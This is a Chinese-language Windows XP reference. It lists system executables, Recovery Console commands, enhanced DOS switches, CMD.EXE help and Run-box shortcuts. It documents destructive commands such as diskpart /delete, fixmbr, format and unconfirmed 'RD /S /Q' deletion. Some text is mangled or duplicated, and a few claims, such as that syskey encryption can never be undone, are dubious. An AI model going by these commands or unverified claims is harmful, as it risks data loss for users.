tcmsetup.exe > telephony client wizard 电话服务客户安装
tcpsvcs.exe > TCP Services TCP服务
.exe > Telnet Utility used to connect to Telnet Server
termsrv.exe > Terminal Server 终端服务
tftp.exe > Trivial FTP 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行
TFTP 服务的远程计算机传输文件
tftpd.exe > Trivial FTP Daemon
themes.exe > Change Windows Themes 桌面主题
tlntadmn.exe > Telnet Server Administrator Telnet服务管理
tlntsess.exe > Display the current Telnet Sessions 显示目前的Telnet会话
tlntsvr.exe > Start the Telnet Server 开始Telnet服务
tracert.exe > Trace a route to display paths 该诊断实用程序将包含不同生存时间
(TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标
采用的路由
tsadmin.exe > Terminal Server Administrator 终端服务管理器
tscon.exe > Attaches a user session to a terminal session. 粘贴用户会话到终端
对话
tsdiscon.exe > Disconnect a user from a terminal session 断开终端服务的用户
tskill.exe > Kill a Terminal server process 杀掉终端服务
tsprof.exe > Used with Terminal Server to query results. 用终端服务得出查询结
果
tsshutdn.exe > Shutdown the system 关闭系统
unlodctr.exe > Part of performance monitoring 性能监视器的一部分
upg351db.exe > Upgrade a jet database 升级Jet数据库
ups.exe > UPS service UPS服务
user.exe > Core Windows Service Windows核心服务
userinit.exe > Part of the winlogon process Winlogon进程的一部分
usrmgr.exe > Start the windows user manager for domains 域用户管理器
utilman.exe > This tool enables an administrator to designate which computers automatically open accessibility tools when Windows 2000 starts. 指定2000启动时自动打开那台机器
verifier.exe > Driver Verifier Manager Driver Verifier Manager
vwipxspx.exe > Loads IPX/SPX VDM 调用IPX/SPX VDM
w32tm.exe > Windows Time Server 时间服务器
wextract.exe > Used to extract windows files 解压缩Windows文件
winchat.exe > Opens Windows Chat 打开Windows聊天
winhlp32.exe > Starts the Windows Help System 运行帮助系统
winlogon.exe > Used as part of the logon process. Logon进程的一部分
winmine.exe > windows Game 挖地雷
winmsd.exe > Windows Diagnostic utility 系统信息
wins.exe > Wins Service Wins服务
winspool.exe > Print Routing 打印路由
winver.exe > Displays the current version of Windows 显示Windows版本
wizmgr.exe > Starts Windows Administration Wizards Windows管理向导
wjview.exe > Command line loader for Java 命令行调用Java
wowdeb.exe > . For starters, the 32-bit APIs require that the WOWDEB.EXE tas
k runs in the target debugee's VM 启动时,32位API需要
wowexec.exe > For running Windows over Windows Applications 在Windows应用程序
上运行Windows
wpnpinst.exe > ?
write.exe > Starts MS Write Program 写字板
wscript.exe > Windows Scripting Utility 脚本工具
wupdmgr.exe > Starts the Windows update Wizard (Internet) 运行Windows升级向导
xcopy.exe > 复制文件和目录,包括子目录
Win XP控制台命令详解
Win XP(包括2000)的控制台命令是在系统出现一些意外情况下的一种非常有效的
诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结,这
次辛苦老范给我们整理了这份实用的秘笈。
第一部分:文件和目录操作命令
Attrib Batch Chdir (Cd) Copy Delete (Del) Expand Mkdir (md) Rmdir (Rd) Type
More
第二部分:系统和磁盘操作命令
Bootcfg hkdsk DiskpartFixboot Fixmbr formatMap
第三部分:辅助操作和特殊功能命令
Cls Disable Enable Exit Help commandnameListsvc Logon Net use
Set Systemroot
Attrib
更改单个文件或目录的属性。该命令设置或删除指派给文件或目录的只读、系统、
存档、隐藏以及压缩属性。
含有下列参数的 attrib 命令仅当使用故障恢复控制台时才可用。含有不同参数的
attrib
命令可在命令提示符中使用。
attrib [ +r|-r] [ +s|-s] [ +h|-h] [ +c|-c] [ [ drive:] [ path] filename]
参数
+r 设置只读属性。
-r 清除只读属性。
+s 设置系统属性。
-s 清除系统属性。
+h 设置隐藏属性。
-h 清除隐藏属性。
+c 设置压缩属性。
-c 清除压缩属性。
[ [ drive:] [ path] filename]
指定要处理的目录或文件的位置和名称。可以一次只更改一个文件,也可以更改整
个目录。
注意:可以用一个命令更改一个文件或目录的多个属性。
Batch
执行在文本文件中指定的命令。batch 命令仅在使用故障恢复控制台时才可用。故
障恢复控制台可以从安装 CD 中启动。
batch input_file [ output_file]
参数
input_file
指定包含要执行的命令列表的文本文件。Input_file 可以由驱动器号和冒号、目录
名、文件名或它们的组合构成。
output_file
如果指定,则在命名文件中存储命令输出。如果没有指定,输出将显示在屏幕上。
范例
下例将执行批处理文件 C:\Jobs\Find.txt 并将输出存储在文件
C:\Jobs\Results.txt 中:
batch c:\jobs\find.txt c:\jobs\results.txt
注意:批处理文件不能包含嵌套的 batch 命令。
Chdir(Cd)
显示当前目录的名称,或更改当前的文件夹。
含有下列参数的 chdir 命令仅在使用故障恢复控制台时才可用。可在命令提示符下
使用带有不同参数的 chdir 命令。
chdir [drive:] [path] [ ..]
或者
cd [drive:] [ path] [ ..]
参数 无
如果不带任何参数,chdir 将显示当前驱动器和文件夹的名称。只与驱动器号一起
使用(例如 cd C:),chdir 将显示指定驱动器上的当前目录。
[ drive:] [ path]
指定要改到的驱动器(如果不是当前驱动器)和目录。
[ ..]
指明要改到父文件夹。在 chdir 和两个句点之间插入一个空格。
注意
Chdir 将空格视作分隔符。用引号将包含空格的目录名扩起来。例如:
cd "driver cache"
Chdir 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地
安装源。
Copy
将单个文件复制到其他位置。含有下列参数的 copy 命令仅在使用故障恢复控制台
时才可用。
可在命令提示符下使用带不同参数的 copy 命令。
copy source [ destination]
参数
source
指定要被复制的文件的位置和名称。Source 可由驱动器号和冒号、目录名、文件名
或组合所组成。
destination
指定要复制到其中的文件或文件集的位置和名称。Destination 可以由驱动器号和
冒号、文件夹名、文件名及组合而组成。
注意
源可以是可移动媒体、当前 Windows 安装的系统目录中的任何目录、驱动器的根目录、
本地安装源或 Cmdcons 目录。
目标可以是除可移动媒体以外的任何与源相同的位置。如果没有指定目标,则默认为当
前目录。
Windows 安装 CD 中的压缩文件在复制过程中解压缩。
Copy 不支持通配符。
Delete(Del)
删除单个文件。含有下列参数的 delete 或 del 命令仅在使用故障恢复控制台时才
可用。可在命令提示符下使用带有不同参数的 delete 或 del 命令。
delete [ drive:] [ path] filename
或者
del [ drive:] [ path] filename
参数
[ drive:] [ path] filename指定要删除的文件的位置和名称。
注意
Delete 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本
地安装源。
Dir
显示目录中的文件和子目录列表。含有下列参数的 dir 命令仅在使用故障恢复控制
台时才可用。可在命令提示符下使用带有不同参数的 dir 命令。
dir [ drive:] [ path] [ filename]
参数
[ drive:] [ path]
指定要查看列表的驱动器和目录。
[ filename]
指定要查看列表的特定文件或一组文件。可以使用多个文件名。文件名可以用空格
、逗号或分号隔开。可以在 filename 参数中使用通配符(? 和 *)显示一组文件。
Dir 还列出磁盘的卷标和序列号,以及所列文件的数目,累计大小和磁盘上剩余的
可用空间(以字节计)。对于每个文件和子目录而言,dir 列出文件的扩展名、文件字
节数、文件的最后修改日期和时间以及下列文件属性(如果可用):
缩写 属性
d 目录
h 隐藏文件
s 系统文件
e 加密
r 只读
a 存档文件
c 已压缩
p 重新分析点
注意:
Dir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本
地安装源。
Expand
从压缩文件中提取文件。通过该命令可从 .cab 文件或压缩文件中提取驱动程序文
件。
含有下列参数的 expand 命令仅在使用故障恢复控制台时才可用。可在命令提示符
下使用带有不同参数的 expand 命令。
expand source [ /F:filespec}] [ destination] [ /d] [ /y]
参数
source
指定要展开的文件。如果源文件只包含一个文件,请使用该选项。source 可由驱动
器号和冒号、目录名、文件名或组合所组成。不能使用通配符。
/f:size
如果源文件包含多个文件,指定要提取的文件的名称。可以对要提取的文件使用通
配符。
destination
指定提取文件或每个单独文件的目标目录和(或)文件名。
/d
列出 CAB 文件中包含的文件而不展开或提取。
/y
在展开或提取文件时不出现覆盖提示。
范例
下例将从安装 CD 上的驱动程序 CAB 文件中提取 Msgame.sys 文件并将其复制到
C:\Windows\System\Drivers:
expand d:\i386\driver.cab\f:msgame.sys c:\windows\system\drivers
下例将展开压缩文件 Access.cp_:
expand d:\i386\acces.cp_c:\windows\system32\access.cpl
下例将列出安装 CD 上的驱动程序 CAB 文件中的所有文件。
expand /d d:\i386\driver.cab
要点
驱动程序 CAB 文件包含成千上万的文件,其中包括由 Windows 提供的大部分驱动程序
。将所有文件从 CAB 文件展开到硬盘上需要花较长的时间和大量的磁盘空间。建议 仅
从该文件中提取需要的文件。
如果没有指定目标,文件将被复制到当前目录。
不能将软盘驱动器或 CD-ROM 等可移动媒体指定为目标。
Mkdir(md)
创建目录或子目录。含有下列参数的 mkdir 命令仅在使用故障恢复控制台时可用。
可在命令提示符下使用带不同参数的 mkdir 命令。
mkdir [ drive:] path
或者
md [ drive:] path
参数
drive:
指定要创建新目录的驱动器。
path
指定新目录的名称和位置。不能使用通配符。
注意
Mkdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地
安装源。
Rename(Ren)
更改单个文件的名称。含有下列参数的 rename 命令仅在使用故障恢复控制台时可
用。可在命令提示符下使用带不同参数的 rename 命令。
rename [ drive:] [ path] filename1 filename2
或者
ren [ drive:] [ path] filename1 filename2
参数
[ drive:] [ path] filename1
指定要重新命名的文件的位置和名称。不能使用通配符。
filename2
为文件指定新的名称。重新命名文件时不能指定新的驱动器或路径。
Rmdir(Rd)
删除目录。含有下列参数的 rmdir 命令仅在使用故障恢复控制台时可用。可在命令
提示符下使用带不同参数的 mdir 命令。
rmdir [ drive:] path
或者
rd [ drive:] path
参数
[ drive:] path
指定要删除的目录的位置和名称。不能使用通配符。
注意
目录必须为空否则命令失败。
Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地
安装源。
Type
显示文本文件的内容。使用 type 或 more 命令查看文本文件而不修改文件。含有
下述参数的 type 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同
参数的 type 命令。
type [ drive:] [ path] filename
或者
more [ drive:] [ path] filename
参数
[ drive:] path] filename
指定要查看的文件的位置和名称。
如果使用 NTFS 驱动器而且文件名包含空格,则必须用引号(")将文件名引起来。
More
显示文本文件的内容。使用 more 或 type 命令查看文本文件而不修改文件。含有
下列参数的 more 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同
参数的 more 命令。
more [ drive:] [ path] filename
或者
type [ drive:] [ path] filename
参数
[ drive:] path] filename
指定要查看的文件的位置和名称。
如果使用 NTFS 驱动器,而且文件名包含空格,则必须用引号(")将文件名引起来
Bootcfg
bootcfg 命令启动配置和故障恢复(对于大多数计算机,即 boot.ini 文件)。
含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符
下使用带有不同参数的 bootcfg 命令。
用法:
bootcfg /default 设置默认引导项。
bootcfg /add 向引导列表中添加 Windows 安装。
bootcfg /rebuild 重复全部 Windows 安装过程并允许用户选择要添加的内容。
注意:使用 bootcfg /rebuild 之前,应先通过 bootcfg /copy 命令备份
boot.ini 文件。
bootcfg /scan 扫描用于 Windows 安装的所有磁盘并显示结果。
注意:这些结果被静态存储,并用于本次会话。如果在本次会话期间磁盘配置发生
变化,为获得更新的扫描,必须先重新启动计算机,然后再次扫描磁盘。
bootcfg /list 列出引导列表中已有的条目。
bootcfg /disableredirect 在启动引导程序中禁用重定向。
bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings]
在启动引导程序中通过指定配置启用重定向。
范例:
bootcfg /redirect com1 115200
bootcfg /redirect useBiosSettings
hkdsk
创建并显示磁盘的状态报告。Chkdsk 命令还可列出并纠正磁盘上的错误。
含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符
下使用带有不同参数的 chkdsk 命令。
vol [drive:] [ chkdsk [drive:] [/p] [/r]
参数 无
如果不带任何参数,chkdsk 将显示当前驱动器中的磁盘状态。
drive: 指定要 chkdsk 检查的驱动器。
/p 即使驱动器不在 chkdsk 的检查范围内,也执行彻底检查。该参数不对驱动器做
任何更改。
/r 找到坏扇区并恢复可读取的信息。隐含着 /p 参数。
注意
Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录(默认为
\%systemroot%\System32)中找到该文件,将试着在 Windows 安装 CD 中找到它。如果
有多引导系统的计算机,必须保证是在包含 Windows 的驱动器上使用该命令。
Diskpart
创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用
。
diskpart [ /add |/delete] [device_name |drive_name |partition_name]
[size]
参数 无
如果不带任何参数,diskpart 命令将启动 diskpart 的 Windows 字符模式版本。
/add
创建新的分区。
/delete
删除现有分区。
device_name
要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如,设备名称:
\Device\HardDisk0
drive_name
以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例
:
D:
partition_name
以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同时使用
。以下是分区名称的范例:
\Device\HardDisk0\Partition1
大小
要创建的分区大小,以兆字节 (MB)表示。仅与 /add 同时使用。
范例
下例将删除分区:
diskpart /delete \ Device\ HardDisk0\ Partition3
diskpart /delete F:
下例将在硬盘上添加一个 20 MB 的分区:
diskpart /add \ Device\ HardDisk0 20
Fixboot
向系统分区写入新的分区引导扇区。只有在使用故障恢复控制台时,才能使用
fixboot 命令。
fixboot [drive]
参数 驱动器
将要写入引导扇区的驱动器。它将替代默认的驱动器(即用户登录的系统分区)。
例如,驱动器:D:
范例
下列命令范例向驱动器 D: 的系统分区写入新的分区引导扇区:
fixboot d:
注意: 如果不带任何参数,fixboot 命令将向用户登录的系统分区写入新的分区引
导扇区。
Fixmbr
修复启动磁盘的 主启动记录。fixmbr 命令仅在使用故障恢复控制台时才可用。
fixmbr [ device_name]
参数
device_name
要写入新的主引导记录的设备(驱动器)。设备名称可从 map 命令的输出获得。例
如,设备名称:
\Device\HardDisk0
范例
下列命令示例向指定设备写入一个新的主引导记录:
fixmbr \Device\HardDisk0
注意
如果不指定 device_name,新的主引导记录将被写入引导设备,即装载主系统的驱动器
。
如果系统检测到无效或非标准分区表标记,将提示用户是否继续执行该命令。除非您访
问驱动器有问题,否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表
并导致分区无法访问。
format
将指定的驱动器格式化为指定的文件系统。含有下列参数的 format 命令仅在使用
故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 format 命令。
format [ drive:] [ /fs:file-system]
参数
drive:
指定要格式化的驱动器。不能从故障恢复控制台格式化软盘。
/q
对驱动器进行快速格式化。不扫描驱动器看是否有坏区域,因此只应对以前格式化
过的驱动器使用该参数。
/fs:file-system
指定要使用的文件系统:FAT、FAT32 或 NTFS 。如果未指定文件系统,将使用现有
的文件系统格式。
Map
显示驱动器号与物理设备名称的映射。该信息在运行 fixboot 和 fixmbr 命令时非
常有用。
map 命令仅在使用故障恢复控制台时才可用。
Map [ arc]
参数
arc
指示 map 命令显示高级 RISC 计算 (ARC)设备名称而不是设备名称。以下是 ARC
设备名称的范例:
multi(0)disk(0)rdisk(0)partition(1)
等价的设备名称是:
\Device\HardDisk0\Partition1
范例
下例将物理设备名映射为使用 ARC 设备名称的驱动器号:
map arc
注意
如果不使用 arc 参数,则 map 命令显示设备名称。
map 命令还显示文件系统的类型和每个磁盘的大小(MB)。
← 返回
Cls
清除屏幕。
清除后的屏幕只显示命令提示符和插入点。
Disable
禁用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。
disable 命令仅在使用故障恢复控制台时才可用。
disable {service_name] |[ device_driver_name}
参数
service_name
要禁用的系统服务名称。
device_driver_name
要禁用的设备驱动程序名称。
范例
下例将禁用 Eventlog 服务:
disable eventlog
注意
disable 命令将指定的服务或驱动程序的启动类型设为 SERVICE_DISABLED 。
使用 disable 命令禁用系统服务或设备驱动程序时,该系统服务或设备驱动程序上次启
动类型的名称将显示在屏幕上。应该记下该名称,以便在需要时使用 enable 命令将启
动类型恢复为上次的设置 。
共有五种启动类型。前三种类型是:SERVICE_AUTO_START 、SERVICE_DISABLED 和SERVI
CE_DEMAND_START 。对应的标准启动类型:自动、禁用和手动,通常使用“计算机管理
”管理工具中的“服务”进行配置。后两种类型是:SERVICE_BOOT_START 和
SERVICE_SYSTEM_START,通常用于配置加载设备驱动程序的方式。例如,在启动计算机
时或启动 Windows 时加载。
Enable
启用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。
enable 命令仅在使用故障恢复控制台时才可用。
enable {service_name |device_driver_name}[ startup_type]
参数
service_name
要启用的系统服务的名称。
device_driver_name
要启用的设备驱动程序的名称。
startup_type
要为服务或设备驱动程序指派的启动类型。有效的启动类型包括:
SERVICE_BOOT_START
SERVICE_SYSTEM_START
SERVICE_AUTO_START
SERVICE_DEMAND_START
范例
下例将 Eventlog 服务的启动类型设为自动或 SERVICE_AUTO_START:
enable eventlog service_auto_start
注意
如果不指派启动类型,enable 命令将列出在 service_name 中指定的服务或设备驱动程
序的当前启动类型。
使用 enable 命令更改启动类型时,上次启动类型的名称将显示在屏幕上。应该记下该
名称,以便在需要时将启动类型恢复为上次的设置。
Exit
关闭故障恢复控制台并重新启动计算机。exit 命令仅在使用“故障恢复控制台”时
才可用。
exit
参数 无
Help
提供有关故障恢复控制台命令的联机信息。
help [ commandname]
参数 无
列出故障恢复控制台中提供的命令。
commandname
提供有关命令信息,包括命令使用的参数。
注意
有两种方法可以获得命令的联机帮助。可以指定 help 命令后的命令名称,或者可以在
命令提示符中键入该命令名称和 /?。开关。例如,键入下列命令可以获得有关extract
命令的信息:
help extract
extract /?
Listsvc
列出计算机上可以使用的服务和驱动程序。listsvc 命令仅在使用故障恢复控制台
时才可用。
listsvc
参数 无
Logon
登录到 Windows 安装。logon 命令仅在使用故障恢复控制台时才可用。
logon
参数 无
注意
logon 命令将列出所有检测到的 Windows 安装,需要安装的本地管理员密码才能登录。
如果 3 次登录尝试都失败,“故障恢复控制台”会退出并且计算机将重新启动。
Net use
将网络共享连接到驱动器号。含有下列参数的 net use 命令仅在使用故障恢复控制
台时可用。在命令提示符下可以使用带不同参数的 net use 命令。
语法
net use [ \\ ComputerName\ShareName [ /user:[ DomainName\ ] UserName]
password] |[ drive
letter:] [ /d]
参数
\\servername\sharename
指定服务器和共享资源的名称。如果 computername 包含空白字符,则将计算机名
从双反斜杠(\\)到计算机名结尾用引号(")括起来。计算机名长度可以是 1 到 15
个字符。
/user
指定建立连接的用户名。
域名
确认用户的凭据时所要使用的域名。
用户名
指定登录时使用的用户名。
密码
指定访问共享资源所需的密码。不输入密码,将给出要键入密码的提示。在密码提
示行处键入密码时不显示密码。
/d
表示将不断开该连接。
Set
显示和设置“故障恢复控制台”的环境变量。set 命令是必须与安全模板一同使用
的可选命令。
含有不同参数的 set 命令仅在使用故障故障恢复控制台时可用。可在命令提示符下
使用带不同参数的 set 命令。
set [ variable=[ string] ]
参数
variable
指定需要设置或修改的变量。
“故障恢复控制台”支持以下环境变量:
变量 说明
AllowWildCards 允许某些命令(如 del 命令)支持通配符。
AllowAllPaths 允许访问系统上的所有文件和目录。
AllowRemovableMedia 允许文件复制到可移动媒体上,如软盘。
NoCopyPrompt 覆盖现有文件时不显示提示。
string
指定要与指定变量关联的字符串。
范例
下例允许在某些故障恢复控制台命令中使用通配符:
set allowwildcards=true
指定要删除的目录的位置和名称。不能使用通配符。
注意
目录必须为空否则命令失败。
Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地
安装源。
Systemroot
将当前目录设置为用户登录到的 Windows 安装系统的 systemroot 文件夹。system
root 命令仅在使用故障恢复控制台时可用。
systemroot
参数 无
XP中的增强DOS命令
◆命令:DIR,列文件、目录
增加参数:/-C
参数说明:DIR列文件、目录时显示的文件大小,其数值以千为单位进行分隔,使用此参
数即“DIR/-C”将取消显示中的分隔符,以满足部分人的视觉习惯。
增加参数:/Q
参数说明:Windows是多用户操作系统,使用此参数即“DIR /Q”列文件、目录时,将显
示出文件、目录的用户属性。
增加参数:/T:C、/T:A、/T:W
参数说明:使用此参数即“DIR/T:C”、“DIR/T:A”、“DIR/T:W”分别显示文件、目录
的创建时间、上次访问时间和上次修改时间。
增加参数:/X
参数说明:使用此参数即“DIR/X”列文件、目录时,会对长文件名同时显示“8.3”格
式的文件名。
◆命令:CD,改变目录
增加参数:/D
参数说明:此参数的作用是快速改变当前目录,比如当前目录是C:\Windows,使用命令
“CD/D E:\Tools”可快速切换到E:\Tools目录下。注:只有在Win XP的“运行”文本框
中输入“CMD”得到的DOS窗口中才能使用此参数。
◆命令:MD,建立目录
功能说明:此命令并未增加参数,但是增强了功能,它可一次建立多级子目录, 例如使
用命令“MD AA\BB\CC\DD”将一次性创建AA、BB、CC、DD四级子目录。而在老版本的DOS
中,若不存在AA子目录,便无法直接建立AA下的BB等深层子目录。
◆命令:RD,删除目录
增加参数:/S
参数说明:使用此参数即“RD/S”用于删除目录树,即删除目录及目录下的所有子目录
和文件,相当于以前版本中的DELTREE命令。
增加参数:/Q
参数说明:使用上面的/S参数删除目录树时,系统会要求用户确认是否真的要删除。若
同时使用/Q参数即“RD/S /Q”,在进行删除操作时将取消确认,相当于DELTREE命令的/
Y参数。
◆命令:DEL,删除文件或目录
增加参数:/F
参数说明:使用此参数即“DEL/F”可删除只读文件。
增加参数:/S、/Q
参数说明:使用此参数即“DEL/S”作用与“RD/S”完全相同,即删除目录及目录下的所
有子目录和文件。同时使用参数/Q,可取消删除操作时的系统确认。
增加参数:/A
参数说明:删除指定属性或指定属性以外的文件,/AR、/AH、/AS、/AA分别表示删除只
读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、
存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S
*.*”表示删除当前目录下除系统文件以外的所有文件。
◆命令:ATTRIB,更改文件或目录的属性
增加参数:/D
参数说明:在Win XP中我们不能把文件或文件夹设置为系统属性,只能设为只读、隐藏
或存档属性。而带参数/D使用ATTRIB命令可以对文件的所有属性进行设定,设定时必须
与参数/S同时使用。例如“ATTRIB /S /D +S D:\Study”,作用是将D:\Study文件夹设
置为系统文件夹。
◆命令:format,格式化磁盘
增加参数:/FS:filessystem
参数说明:按指定文件系统类型(FAT、FAT32、NTFS)格式化磁盘,例如“format
/FS:NTFS”。
◆命令:DATE、TIME,显示系统日期和时间
增加参数:/T
参数说明:使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输
入新日期和时间。
Windows XP 命令解释程序一个新的实例
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
[/S] [/C | /K] string]
/C
/K
/S /C 或 /K 后修改字符串处理(见下)
/Q
/D AutoRun 命令(见下)
/A ANSI
/U Unicode
/T:fg 设置前景/背景颜色(详细信息,请见 COLOR /?)
/E:ON 启用命令扩展(见下)
/E:OFF(见下)
/F:ON 启用文件和目录名称完成字符 (见下)
/F:OFF(见下)
/V:ON 将 ! 作为定界符启动延缓环境变量扩展。如: /V:ON 会
!var! 在执行时允许 !var! 扩展变量 var。var 语法
FOR 循环内不同。
/V:OFF
请注意,如果字符串有引号,可以接受用命令分隔符 '&&' 隔开
的多个命令。并且,由于兼容原因,/X 与 /E:ON 相同,/Y 与
/E:OFF 相同,并且 /R 与 /C 相同。忽略任何其他命令行开关。
如果指定了 /C 或 /K,命令行开关后的命令行其余部分将作为命令行处
理;在这种情况下,会使用下列逻辑处理引号字符("):
1. 如果符合下列所有条件,那么在命令行上的引号字符将被
:
- 不带 /S 命令行开关
- 整整两个引号字符
- 在两个引号字符之间没有特殊字符,特殊字符为下列中的
: <>()@^|
- 在两个引号字符之间有至少一个空白字符
- 在两个引号字符之间有至少一个可执行文件的名称。
2.
的最后一个引号字符,
如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找
以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或
两个都存在,这两个变量会先被执行。
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
/或
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
命令扩展是按默认值启用的。您也可以使用 /E:OFF,为某一
特定调用而停用扩展。您可以在机器上和/或用户登录会话上
启用或停用 CMD.EXE 所有调用的扩展,这要通过设置使用
REGEDT32.EXE 的注册表中的一个或两个 REG_DWORD 值:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
/或
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
到 0x1 或 0x0。用户特定设置比机器设置有优先权。命令行
开关比注册表设置有优先权。
命令行扩展包括对下列命令所做的更改和/或添加:
DEL 或 ERASE
COLOR
CD 或 CHDIR
MD 或 MKDIR
PROMPT
PUSHD
POPD
SET
SETLOCAL
ENDLOCAL
IF
FOR
CALL
SHIFT
GOTO
START (同时包括对外部命令调用所做的更改)
ASSOC
FTYPE
有关详细信息,请键入 HELP 命令名。
延迟变量环境扩展不按默认值启用。您可以用/V:ON 或 /V:OFF
命令行开关,为 CMD.EXE 的某个调用而启用或停用延迟环境变量扩充。
您可以在机器上和/或用户登录会话上启用或停用 CMD.EXE 所有
调用的完成,这要通过设置使用 REGEDT32.EXE 的注册表中的
一个或两个 REG_DWORD 值:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
/或
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
到 0x1 或 0x0。用户特定设置比机器设置有优先权。命令行开关
比注册表设置有优先权。
如果延迟环境变量扩充被启用,惊叹号字符可在执行时间,被用来
代替一个环境变量的数值。
文件和目录名完成不按默认值启用。您可以用 /F:ON 或 /F:OFF
命令行开关,为 CMD.EXE 的某个调用而启用或停用文件名完成。 您可以
在机器上和/或用户登录会话上启用或停用 CMD.EXE 所有调用的
完成,这要通过设置使用 REGEDT32.EXE 的注册表中的一个或两个
REG_DWORD 值:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
/或
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
由一个控制字符的十六进制值作为一个特定参数(例如,0x4 是
Ctrl-D,0x6 是 Ctrl-F)。 用户特定设置优先于机器设置。命令行开关
优先于注册表设置。
如果完成是用 /F:ON 命令行开关启用的,两个要使用的控制符是: 目录名
字完成用 Ctrl-D, 文件名完成用 Ctrl-F。 要停用注册表中的某个
字符,请用空格(0x20)的数值,因为此字符不是控制字符。
如果键入两个控制字符中的一个,完成会被调用。完成功能将
路径字符串带到光标的左边,如果没有通配符,将通配符附加
到左边,并建立相符的路径列表。然后,显示第一个相符的路
径。如果没有相符的路径,则发出嘟嘟声,不影响显示。之后,
重复按同一个控制字符会循环显示相符路径的列表。将 Shift 键
跟控制字符同时按下,会倒着显示列表。如果对该行进行了任
何编辑,并再次按下控制字符,保存的相符路径的列表会被丢弃,
新的会被生成。如果在文件和目录名完成之间切换,会发生
同样现象。两个控制字符之间的唯一区别是文件完成字符符合
文件和目录名,而目录完成字符只符合目录名。如果文件完成
被用于内置式目录命令(CD、MD 或 RD),就会使用目录完成。
将引号将相符路径括起来,完成代码可以正确处理含有空格
或其他特殊字符的文件名。同时,如果备份,然后从行内调用
文件完成,完成被调用是位于光标右方的文字会被丢弃。
需要引号的特殊字符是:
<space>
&()[]{}^=;!'+,`~
开始——运行。。。。。。大家一定很熟悉了吧,但出了PING,REGEDIT,MMC之外还还记得什么吗?那就来这儿看看吧!
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
